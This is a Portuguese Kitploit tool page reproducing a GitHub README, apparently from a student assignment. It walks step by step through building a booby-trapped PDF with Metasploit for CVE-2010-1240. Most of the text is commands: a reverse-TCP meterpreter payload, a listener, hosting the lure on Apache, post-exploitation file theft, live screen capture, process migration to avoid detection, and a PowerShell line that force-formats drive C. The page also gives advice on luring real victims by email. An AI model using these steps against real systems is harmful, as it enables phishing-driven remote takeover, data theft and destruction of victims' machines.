Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Embedded-PDF — Este vídeo de demonstração mostra como podemos controlar o dispositivo da vítima enviando o arquivo PDF de aparência inofensiva para o alvo, que na verdade contém um payload embutido. O exploit foi tornado público como CVE-2010-1240. | Kitploit
Ferramentas/GitHubGitHub/jasmoon99/embedded-pdf
Ferramentas de PhishingGeração de PayloadsExploraçãoPós-ExploraçãoTestes de PenetraçãoComando e ControleEngenharia SocialAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHubjasmoon99/embedded-pdf

Embedded-PDF

Este vídeo de demonstração mostra como podemos controlar o dispositivo da vítima enviando o arquivo PDF de aparência inofensiva para o alvo, que na verdade contém um payload embutido. O exploit foi tornado público como CVE-2010-1240.

716há 5 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

Conexão de Backdoor Embutida via Arquivos PDF 😈

trazido a você por    

Introdução

Este vídeo de demonstração mostra como podemos controlar o dispositivo da vítima enviando um arquivo PDF de aparência inocente para o alvo, que na verdade contém um payload embutido. O exploit foi tornado público como CVE-2010-1240.

Assim que o PDF é aberto no Adobe Reader, os usuários que são enganados por nós para concordarem com os pop-ups de segurança nos permitirão obter uma sessão meterpreter conectada aos seus dispositivos via conexão TCP reversa. Até esse momento, todos os seus dados e o que estão fazendo agora estão sob nossa vigilância.

Hehe~Boi

Lista de Software/Ferramentas

  • Metasploit
  • Adobe Reader <= 8.1.2

Ambiente

Kali Linux         Windows 7 or 10         Adobe Reader        

  • Máquina do Atacante: Kali Linux versão 2021.1
  • SO Alvo: Windows 10 (x86) ou Windows 7 (x86)
  • Software Alvo: Adobe Reader 8.1.2

Etapas Detalhadas

Primeiro, iniciamos o MSFconsole que fornece uma interface de linha de comando para acessarmos o framework Metasploit.

root@kitploit:~
msfconsole

Em seguida, pesquisamos por exploits que correspondem ao nosso alvo Windows e ao Adobe PDF Reader, onde será exibida uma lista completa de exploits que podem ser usados para invadir a máquina Windows da vítima e explorar as vulnerabilidades do Adobe PDF Reader.

root@kitploit:~
search type:exploit platform:windows adobe pdf

Nesta exploração, selecionamos e utilizamos o módulo "adobe_pdf_embedded_exe" usando o comando abaixo para atingir o objetivo de invadir a vítima.

root@kitploit:~
use exploit/windows/fileformat/adobe_pdf_embedded_exe

Também podemos verificar as informações do exploit usando o comando “info” conforme mostrado abaixo:

root@kitploit:~
info

Em seguida, definimos o payload para usar conexão TCP reversa. Usamos também o Meterpreter que fornece um shell interativo que facilita o uso de todos os tipos de funções ao inserir e executar código para explorar a máquina da vítima.

root@kitploit:~
set payload windows/meterpreter/reverse_tcp

Então, definiremos o host e a porta de escuta. Para LHOST, precisamos colocar o endereço IP da máquina do atacante, que neste caso é o endereço IP da nossa máquina Kali (10.0.2.4)*.

  • *obs.*
    • Você deve usar o IP da sua própria máquina Kali
    • Você pode usar um número de porta diferente

Enquanto isso, para LPORT, cabe a nós definir um número de porta que não seja comumente usado.

root@kitploit:~
# para verificar o endereço IP da máquina Kali
ifconfig

set LHOST *10.0.2.4*
set LPORT 5665

Em seguida, definiremos o arquivo de entrada para a base do PDF com a flag INFILENAME*. A seguir, definiremos o nome do arquivo para algo que atraia o interesse da vítima para abrir o arquivo PDF malicioso.

  • *obs.*
    • Você deve garantir o caminho do seu arquivo PDF
    • Você pode usar um nome de arquivo diferente
root@kitploit:~
set INFILENAME '/home/kali/Documents/WIC3004Assignment.pdf'
set FILENAME 'Bawang_Ranger_WIC3004Report.pdf'

Podemos visualizar nossas opções novamente antes de digitar o comando “exploit” para gerar o payload junto com o PDF.

root@kitploit:~
# Então podemos mostrar as informações ou opções com
show info | show options

exploit

Quando terminarmos de gerar o arquivo PDF, moveremos o arquivo para /var/www/html, que é o diretório da nossa máquina Kali para hospedar o servidor de aplicação web para a vítima baixar o arquivo PDF posteriormente.

  • Nota:
    • Se você definiu um nome de arquivo diferente, certifique-se de copiar o caminho correto!
root@kitploit:~
sudo mv /home/kali/.msf4/local/Bawang_Ranger_WIC3004Report.pdf /var/www/html

Em seguida, para configurar nosso listener, usaremos "exploit/multi/handler". Novamente, definiremos o payload, LHOST, LPORT alinhados com o que definimos ao gerar o arquivo PDF malicioso. Então executaremos o payload.

  • Nota:
    • LHOST: Observe o endereço IP da sua própria máquina Kali
    • LPORT: Se você definiu um número de porta diferente, certifique-se de digitar o número corretamente
    • show info ou show options é um comando opcional para executar.
      • Executá-lo é apenas para verificar o que você acabou de definir
root@kitploit:~
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.2.4
set LPORT 5665
[show info | show options]
run

Em outro terminal, verificamos o status do servidor Apache para garantir que ele está em execução para hospedar nosso arquivo PDF em /var/www/html para a vítima baixar o arquivo.

root@kitploit:~
service apache2 status

# Se estiver inativo, inicie o serviço
service apache2 start

Na máquina Windows, abra qualquer navegador, como Chrome, e digite o IP da nossa Kali (10.0.2.4)* para acessar o servidor de aplicação web da máquina Kali.

*Nota: Observe o endereço IP da sua própria máquina Kali

Em seguida, simule um usuário salvando o arquivo PDF pretendido.

Assim que o arquivo for aberto pela vítima no Adobe Reader 8.1.2 com a aceitação das mensagens de segurança do prompt, podemos observar em nossa máquina Kali que temos uma nova sessão conectada via conexão TCP reversa.

Em um cenário real, configuraremos um site com o PDF de payload embutido para permitir que a vítima baixe ou anexe o arquivo via e-mail.


Resultado da exploração

Então, podemos acessar remotamente a máquina da vítima e, em seguida, realizar mais comportamentos maliciosos que desejamos na sessão do meterpreter.

Para mostrar uma lista de coisas que podemos fazer

root@kitploit:~
help

Listar diretório atual

root@kitploit:~
pwd

Listar os arquivos nesse diretório

root@kitploit:~
ls

Baixar pasta ou arquivo da máquina vítima

Por exemplo, se houver um arquivo chamado password.txt, podemos emitir o comando download password.txt

root@kitploit:~
download [folder name | filename with extension]

Criar arquivo na máquina vítima

Claro, podemos escrever script malicioso (implantando backdoor) para nos manter conectados à máquina Windows se formos realmente maus! 💀

root@kitploit:~
   # Iniciar prompt de comando em segundo plano
   execute -f cmd.exe -H -i
   
   # Criar arquivo no Windows
   echo "You have been hacked" > hack.txt    

Interagir com o Windows

root@kitploit:~
   # abrir o arquivo txt que acabamos de criar
   hack.txt

   # Tirar screenshot
   screenshot
   
   # Observar o usuário remoto em tempo real
   screenshare

Adicional

No entanto, o atacante pode reduzir a suspeita migrando o processo do meterpreter para um diferente usando o módulo migrate na sessão do meterpreter.

root@kitploit:~
meterpreter> run post/windows/manage/migrate

Aqui, ele irá gerar automaticamente um novo processo na máquina da vítima para o qual migrar. A vítima poderá então deletar o arquivo PDF infectado, completamente inconsciente de que o processo já foi para outro lugar.

O atacante pode criar ainda mais scripts maliciosos na máquina alvo usando o prompt de comando (cmd) ou PowerShell, que são capazes de derrubar todo o sistema operacional para que não funcione corretamente.

root@kitploit:~
meterpreter> shell 
root@kitploit:~
# Iniciar o Windows PowerShell
powershell

# Comando PowerShell para formatar a unidade C à força.
New-Partition -DiskNumber 1 -UseMaximumSize -AssignDriveLetter C| Format-Volume -DriveLetter C -FileSystemLabel "New"-FileSystem NTFS -Full -Force -Confirm:$false

Vídeo de Demonstração

Demo

Baixar ferramenta